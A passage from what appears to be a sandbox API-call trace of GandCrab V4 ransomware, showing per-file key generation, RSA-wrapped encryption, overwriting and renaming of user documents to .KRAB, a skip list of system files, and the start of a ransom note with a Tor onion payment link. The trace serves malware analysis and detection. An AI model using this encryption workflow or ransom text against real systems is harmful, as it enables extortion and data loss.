dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0090.512] GetLastError () returned 0x0 [0090.512] CryptDestroyKey (hKey=0x10231f8) returned 1 [0090.512] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0090.512] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\X1BRjpVn-eHUMucU.doc" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\x1brjpvn-ehumucu.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0090.512] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0090.513] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0090.513] ReadFile (in: hFile=0x43c, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ea7c*=0x16551, lpOverlapped=0x0) returned 1 [0090.564] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffe9aaf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.564] WriteFile (in: hFile=0x43c, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x16551, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ea78*=0x16551, lpOverlapped=0x0) returned 1 [0090.565] WriteFile (in: hFile=0x43c, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0090.565] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.570] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.570] CloseHandle (hObject=0x43c) returned 1 [0090.571] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.571] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\X1BRjpVn-eHUMucU.doc" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\x1brjpvn-ehumucu.doc"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\X1BRjpVn-eHUMucU.doc.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\x1brjpvn-ehumucu.doc.krab")) returned 1 [0090.572] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.572] FindNextFileW (in: hFindFile=0x1023238, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0090.572] lstrcmpW (lpString1="XbVuPK1.ots", lpString2=".") returned 1 [0090.572] lstrcmpW (lpString1="XbVuPK1.ots", lpString2="..") returned 1 [0090.572] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\", lpString2="XbVuPK1.ots" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\XbVuPK1.ots") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\XbVuPK1.ots" [0090.572] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0090.573] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\XbVuPK1.ots.KRAB") returned 91 [0090.573] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\XbVuPK1.ots") returned 86 [0090.573] lstrlenW (lpString=".ots") returned 4 [0090.573] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0090.573] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".ots ") returned 5 [0090.573] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.574] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\XbVuPK1.ots") returned 86 [0090.574] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\XbVuPK1.ots") returned 86 [0090.574] lstrcmpiW (lpString1="XbVuPK1.ots", lpString2="desktop.ini") returned 1 [0090.574] lstrcmpiW (lpString1="XbVuPK1.ots", lpString2="autorun.inf") returned 1 [0090.574] lstrcmpiW (lpString1="XbVuPK1.ots", lpString2="ntuser.dat") returned 1 [0090.574] lstrcmpiW (lpString1="XbVuPK1.ots", lpString2="iconcache.db") returned 1 [0090.574] lstrcmpiW (lpString1="XbVuPK1.ots", lpString2="bootsect.bak") returned 1 [0090.574] lstrcmpiW (lpString1="XbVuPK1.ots", lpString2="boot.ini") returned 1 [0090.574] lstrcmpiW (lpString1="XbVuPK1.ots", lpString2="ntuser.dat.log") returned 1 [0090.574] lstrcmpiW (lpString1="XbVuPK1.ots", lpString2="thumbs.db") returned 1 [0090.574] lstrcmpiW (lpString1="XbVuPK1.ots", lpString2="KRAB-DECRYPT.html") returned 1 [0090.574] lstrcmpiW (lpString1="XbVuPK1.ots", lpString2="KRAB-DECRYPT.txt") returned 1 [0090.574] lstrcmpiW (lpString1="XbVuPK1.ots", lpString2="CRAB-DECRYPT.txt") returned 1 [0090.574] lstrcmpiW (lpString1="XbVuPK1.ots", lpString2="ntldr") returned 1 [0090.574] lstrcmpiW (lpString1="XbVuPK1.ots", lpString2="NTDETECT.COM") returned 1 [0090.574] lstrcmpiW (lpString1="XbVuPK1.ots", lpString2="Bootfont.bin") returned 1 [0090.574] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0090.575] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1011678) returned 1 [0090.576] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0090.577] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0090.577] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0090.578] CryptGenRandom (in: hProv=0x1011678, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0090.578] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0090.578] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.579] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x10111b0) returned 1 [0090.580] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0090.581] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0090.581] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0090.581] CryptGenRandom (in: hProv=0x10111b0, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0090.581] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0090.581] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.582] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1010bd8) returned 1 [0090.583] CryptImportKey (in: hProv=0x1010bd8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0x10235f8) returned 1 [0090.583] CryptGetKeyParam (in: hKey=0x10235f8, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0090.584] CryptEncrypt (in: hKey=0x10235f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0090.584] GetLastError () returned 0x0 [0090.584] CryptDestroyKey (hKey=0x10235f8) returned 1 [0090.584] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0090.584] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x10113d0) returned 1 [0090.586] CryptImportKey (in: hProv=0x10113d0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0x10235f8) returned 1 [0090.586] CryptGetKeyParam (in: hKey=0x10235f8, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0090.588] CryptEncrypt (in: hKey=0x10235f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0090.589] GetLastError () returned 0x0 [0090.589] CryptDestroyKey (hKey=0x10235f8) returned 1 [0090.589] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0090.589] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\XbVuPK1.ots" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\xbvupk1.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0090.589] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0090.590] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0090.590] ReadFile (in: hFile=0x43c, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ea7c*=0xc034, lpOverlapped=0x0) returned 1 [0090.609] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xffff3fcc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.609] WriteFile (in: hFile=0x43c, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xc034, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ea78*=0xc034, lpOverlapped=0x0) returned 1 [0090.609] WriteFile (in: hFile=0x43c, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0090.610] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.625] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.626] CloseHandle (hObject=0x43c) returned 1 [0090.626] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.630] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\XbVuPK1.ots" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\xbvupk1.ots"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\XbVuPK1.ots.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\xbvupk1.ots.krab")) returned 1 [0090.631] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.632] FindNextFileW (in: hFindFile=0x1023238, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0090.632] lstrcmpW (lpString1="ZDPW3bRzeF-27yP.odp", lpString2=".") returned 1 [0090.632] lstrcmpW (lpString1="ZDPW3bRzeF-27yP.odp", lpString2="..") returned 1 [0090.632] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\", lpString2="ZDPW3bRzeF-27yP.odp" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\ZDPW3bRzeF-27yP.odp") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\ZDPW3bRzeF-27yP.odp" [0090.632] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0090.632] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\ZDPW3bRzeF-27yP.odp.KRAB") returned 99 [0090.632] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\ZDPW3bRzeF-27yP.odp") returned 94 [0090.632] lstrlenW (lpString=".odp") returned 4 [0090.632] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0090.633] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".odp ") returned 5 [0090.633] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.633] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\ZDPW3bRzeF-27yP.odp") returned 94 [0090.633] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\ZDPW3bRzeF-27yP.odp") returned 94 [0090.633] lstrcmpiW (lpString1="ZDPW3bRzeF-27yP.odp", lpString2="desktop.ini") returned 1 [0090.633] lstrcmpiW (lpString1="ZDPW3bRzeF-27yP.odp", lpString2="autorun.inf") returned 1 [0090.633] lstrcmpiW (lpString1="ZDPW3bRzeF-27yP.odp", lpString2="ntuser.dat") returned 1 [0090.634] lstrcmpiW (lpString1="ZDPW3bRzeF-27yP.odp", lpString2="iconcache.db") returned 1 [0090.634] lstrcmpiW (lpString1="ZDPW3bRzeF-27yP.odp", lpString2="bootsect.bak") returned 1 [0090.634] lstrcmpiW (lpString1="ZDPW3bRzeF-27yP.odp", lpString2="boot.ini") returned 1 [0090.634] lstrcmpiW (lpString1="ZDPW3bRzeF-27yP.odp", lpString2="ntuser.dat.log") returned 1 [0090.634] lstrcmpiW (lpString1="ZDPW3bRzeF-27yP.odp", lpString2="thumbs.db") returned 1 [0090.634] lstrcmpiW (lpString1="ZDPW3bRzeF-27yP.odp", lpString2="KRAB-DECRYPT.html") returned 1 [0090.634] lstrcmpiW (lpString1="ZDPW3bRzeF-27yP.odp", lpString2="KRAB-DECRYPT.txt") returned 1 [0090.634] lstrcmpiW (lpString1="ZDPW3bRzeF-27yP.odp", lpString2="CRAB-DECRYPT.txt") returned 1 [0090.634] lstrcmpiW (lpString1="ZDPW3bRzeF-27yP.odp", lpString2="ntldr") returned 1 [0090.634] lstrcmpiW (lpString1="ZDPW3bRzeF-27yP.odp", lpString2="NTDETECT.COM") returned 1 [0090.634] lstrcmpiW (lpString1="ZDPW3bRzeF-27yP.odp", lpString2="Bootfont.bin") returned 1 [0090.634] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0090.642] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1010bd8) returned 1 [0090.644] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0090.644] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0090.645] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0090.645] CryptGenRandom (in: hProv=0x1010bd8, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0090.645] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0090.645] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.645] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1010930) returned 1 [0090.743] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0090.746] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0090.746] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0090.746] CryptGenRandom (in: hProv=0x1010930, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0090.746] CryptReleaseContext (hProv=0x1010930, dwFlags=0x0) returned 1 [0090.746] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.747] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1010bd8) returned 1 [0090.748] CryptImportKey (in: hProv=0x1010bd8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbd2a0) returned 1 [0090.748] CryptGetKeyParam (in: hKey=0xfbd2a0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0090.748] CryptEncrypt (in: hKey=0xfbd2a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0090.749] GetLastError () returned 0x0 [0090.749] CryptDestroyKey (hKey=0xfbd2a0) returned 1 [0090.749] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0090.749] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x10113d0) returned 1 [0090.750] CryptImportKey (in: hProv=0x10113d0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbd7a0) returned 1 [0090.750] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0090.750] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0090.751] GetLastError () returned 0x0 [0090.751] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0090.751] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0090.751] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\ZDPW3bRzeF-27yP.odp" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\zdpw3brzef-27yp.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0090.751] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0090.751] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0090.752] ReadFile (in: hFile=0x43c, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ea7c*=0xcfb4, lpOverlapped=0x0) returned 1 [0090.767] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xffff304c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.767] WriteFile (in: hFile=0x43c, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xcfb4, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ea78*=0xcfb4, lpOverlapped=0x0) returned 1 [0090.768] WriteFile (in: hFile=0x43c, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0090.768] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.773] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.774] CloseHandle (hObject=0x43c) returned 1 [0090.774] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.775] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\ZDPW3bRzeF-27yP.odp" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\zdpw3brzef-27yp.odp"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\ZDPW3bRzeF-27yP.odp.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\zdpw3brzef-27yp.odp.krab")) returned 1 [0090.776] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.776] FindNextFileW (in: hFindFile=0x1023238, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0090.776] FindClose (in: hFindFile=0x1023238 | out: hFindFile=0x1023238) returned 1 [0090.776] CloseHandle (hObject=0x734) returned 1 [0090.776] FindNextFileW (in: hFindFile=0x1022ff8, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0090.776] lstrcmpW (lpString1="xRugo", lpString2=".") returned 1 [0090.776] lstrcmpW (lpString1="xRugo", lpString2="..") returned 1 [0090.777] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\", lpString2="xRugo" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo" [0090.777] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\" [0090.777] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0090.777] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0090.777] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0090.777] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0090.777] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0090.777] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.777] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0090.778] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\\\KRAB-DECRYPT.txt") returned 85 [0090.778] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\xrugo\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x734 [0090.779] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. 